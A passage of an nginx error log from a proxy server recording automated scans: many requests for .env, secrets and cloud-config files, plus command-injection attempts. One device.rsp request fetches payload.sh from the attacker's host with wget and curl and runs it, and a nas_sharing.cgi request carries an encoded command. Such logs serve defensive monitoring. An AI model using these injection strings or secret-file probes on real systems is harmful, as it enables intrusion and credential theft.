408#408: *288466 open() "/var/www/html/Backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /Backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 408#408: *288467 open() "/var/www/html/Application/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /Application/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 408#408: *288468 open() "/var/www/html/sendgrid/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sendgrid/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 408#408: *288469 open() "/var/www/html/staging.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /staging.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:14 [error] 408#408: *288470 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:15 [error] 409#409: *288471 open() "/var/www/html/php-info" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /php-info HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:15 [error] 409#409: *288472 open() "/var/www/html/services/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /services/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:15 [error] 409#409: *288473 open() "/var/www/html/config/secrets.yml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/secrets.yml HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:15 [error] 409#409: *288474 open() "/var/www/html/admin/info.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/info.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:16 [error] 407#407: *289962 open() "/var/www/html/env.json" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /env.json HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:16 [error] 407#407: *289963 open() "/var/www/html/core/.env.prod" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /core/.env.prod HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:16 [error] 407#407: *289964 open() "/var/www/html/uploads/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /uploads/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:16 [error] 407#407: *289965 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:17 [error] 408#408: *289966 open() "/var/www/html/assets/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /assets/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:17 [error] 408#408: *289967 open() "/var/www/html/sendgrid.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sendgrid.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:17 [error] 408#408: *289968 open() "/var/www/html/sources/.env.prod" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sources/.env.prod HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:17 [error] 408#408: *289969 open() "/var/www/html/sources/.env.production" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sources/.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:17 [error] 408#408: *289970 open() "/var/www/html/v1/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /v1/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:18 [error] 408#408: *289971 open() "/var/www/html/js/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /js/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:18 [error] 408#408: *289972 open() "/var/www/html/boot/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /boot/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:18 [error] 408#408: *289973 open() "/var/www/html/run/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /run/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:31:18 [error] 408#408: *289974 open() "/var/www/html/proc/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /proc/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 18:56:08 [error] 408#408: *289998 open() "/var/www/html/cgi-bin/nas_sharing.cgi" failed (2: No such file or directory), client: 5.181.188.219, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4NTJcXHg2NVxceDczXFx4NTdcXHg2MVxceDczXFx4NDhcXHg2NVxceDcyXFx4NjV8c2g= HTTP/1.1", host: "91.82.83.208" +2026/01/18 19:42:14 [error] 409#409: *290049 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.219.131, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/18 19:55:28 [error] 409#409: *290061 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 78.142.18.92, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20busybox%20wget%20http%3A%2F%2F78.142.18.92%2Fpayload.sh%3B%20-O-%20%7Csh%3B%20curl%20-O%20http%3A%2F%2F78.142.18.92%2Fpayload.sh%3B%20chmod%20777%20payload.sh%3B%20chmod%20%2Bx%20payload.sh%3B%20sh%20payload.sh HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 20:08:43 [error] 409#409: *290077 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 409#409: *290078 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 409#409: *290079 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 409#409: *290080 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 410#410: *290081 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 410#410: *290082 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:43 [error] 410#410: *290083 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290084 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290085 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290086 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290087 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290088 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:44 [error] 410#410: *290089 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290090 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290091 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290092 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290093 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290094 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290095 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 410#410: *290096 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:45 [error] 407#407: *290097 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290098 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290099 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290100 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290101 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290102 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290103 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:46 [error] 407#407: *290104 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:47 [error] 407#407: *290105 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:08:47 [error] 407#407: *290106 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:03 [error] 407#407: *290119 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:03 [error] 407#407: *290120 open() "/var/www/html/core/.env.save" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /core/.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 407#407: *290121 open() "/var/www/html/docs/.env.conf" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.conf HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290122 open() "/var/www/html/kyc/.env.local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /kyc/.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290123 open() "/var/www/html/core/.env.smtp" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /core/.env.smtp HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290124 open() "/var/www/html/core/.env.test" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /core/.env.test HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290125 open() "/var/www/html/mail/.env.conf" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /mail/.env.conf HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290126 open() "/var/www/html/docs/.env.prod" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.prod HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:04 [error] 408#408: *290127 open() "/var/www/html/logs/temp/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /logs/temp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290128 open() "/var/www/html/env/config.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /env/config.log HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290129 open() "/var/www/html/docs/.env.save" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290130 open() "/var/www/html/docs/.env.smtp" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.smtp HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290131 open() "/var/www/html/download/.env~" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /download/.env~ HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290132 open() "/var/www/html/django/env.php" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /django/env.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290133 open() "/var/www/html/django/env.yml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /django/env.yml HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290134 open() "/var/www/html/crm/.env.local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /crm/.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:05 [error] 408#408: *290135 open() "/var/www/html/docs/.env.test" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.test HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 408#408: *290136 open() "/var/www/html/crm/config.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /crm/config.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 408#408: *290137 open() "/var/www/html/cron/.env.dist" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /cron/.env.dist HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 409#409: *290138 open() "/var/www/html/node/.env.dist" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /node/.env.dist HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 409#409: *290139 open() "/var/www/html/nextjs/env.yml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /nextjs/env.yml HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 409#409: *290140 open() "/var/www/html/nextjs/env.php" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /nextjs/env.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:06 [error] 409#409: *290141 open() "/var/www/html/express/env.py" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /express/env.py HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:07 [error] 409#409: *290142 open() "/var/www/html/database/.env~" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /database/.env~ HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:07 [error] 409#409: *290143 open() "/var/www/html/dev/.env.local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /dev/.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:07 [error] 409#409: *290144 open() "/var/www/html/new/.env.local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /new/.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:07 [error] 409#409: *290145 open() "/var/www/html/myproject/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /myproject/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:07 [error] 409#409: *290146 open() "/var/www/html/dev/.env.stage" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /dev/.env.stage HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:08 [error] 409#409: *290147 open() "/var/www/html/gitlab-ci/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /gitlab-ci/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:08 [error] 409#409: *290148 open() "/var/www/html/dev/.env.token" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /dev/.env.token HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:25:08 [error] 409#409: *290149 open() "/var/www/html/dev/.env_1.bak" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /dev/.env_1.bak HTTP/1.1", host: "91.82.83.208" +2026/01/18 20:27:21 [error] 409#409: *290154 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 143.110.192.43, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/admin/login.asp" +2026/01/18 20:47:20 [error] 410#410: *290167 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/18 21:30:59 [error] 410#410: *290203 open() "/var/www/html/login" failed (2: No such file or directory), client: 103.252.89.75, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/18 21:38:46 [error] 410#410: *290208 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 21:47:32 [error] 410#410: *290237 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 22:24:37 [error] 407#407: *290273 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 22:38:54 [error] 410#410: *291776 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 199.45.155.89, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:14 [error] 415#415: *291789 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:15 [error] 416#416: *291790 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:15 [error] 417#417: *291791 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:15 [error] 414#414: *291792 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:16 [error] 414#414: *291793 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:16 [error] 414#414: *291794 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:16 [error] 414#414: *291796 open() "/var/www/html/getcfg.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /getcfg.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:17 [error] 414#414: *291797 open() "/var/www/html/cp/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /cp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:18 [error] 414#414: *291798 open() "/var/www/html/ads/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /ads/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:18 [error] 414#414: *291799 open() "/var/www/html/config/aws.yml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/aws.yml HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:18 [error] 414#414: *291800 open() "/var/www/html/staticfiles/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /staticfiles/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:18 [error] 414#414: *291801 open() "/var/www/html/opt/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /opt/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:18 [error] 414#414: *291802 open() "/var/www/html/Api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /Api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:19 [error] 414#414: *291803 open() "/var/www/html/App/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /App/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:20 [error] 414#414: *291804 open() "/var/www/html/psnlink/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /psnlink/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:21 [error] 414#414: *291805 open() "/var/www/html/ftpmaster/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /ftpmaster/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:21 [error] 414#414: *291806 open() "/var/www/html/error/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /error/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:21 [error] 414#414: *291807 open() "/var/www/html/div/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /div/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:21 [error] 415#415: *291808 open() "/var/www/html/theme/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /theme/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:21 [error] 415#415: *291809 open() "/var/www/html/well-known/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /well-known/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:23 [error] 415#415: *291810 open() "/var/www/html/old.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /old.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291811 open() "/var/www/html/environments/local/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /environments/local/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291812 open() "/var/www/html/environments/production/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /environments/production/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291813 open() "/var/www/html/scripts/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /scripts/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291814 open() "/var/www/html/styles/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /styles/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291815 open() "/var/www/html/inc/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /inc/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291816 open() "/var/www/html/.env_bak" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env_bak HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291817 open() "/var/www/html/.env-sample" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-sample HTTP/1.1", host: "91.82.83.208" +2026/01/18 22:59:24 [error] 415#415: *291818 open() "/var/www/html/fastlane/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /fastlane/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 23:00:42 [error] 415#415: *291821 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:02:09 [error] 415#415: *291823 open() "/var/www/html/login" failed (2: No such file or directory), client: 103.252.89.75, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/18 23:32:20 [error] 416#416: *291848 open() "/var/www/html/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291849 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291850 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: 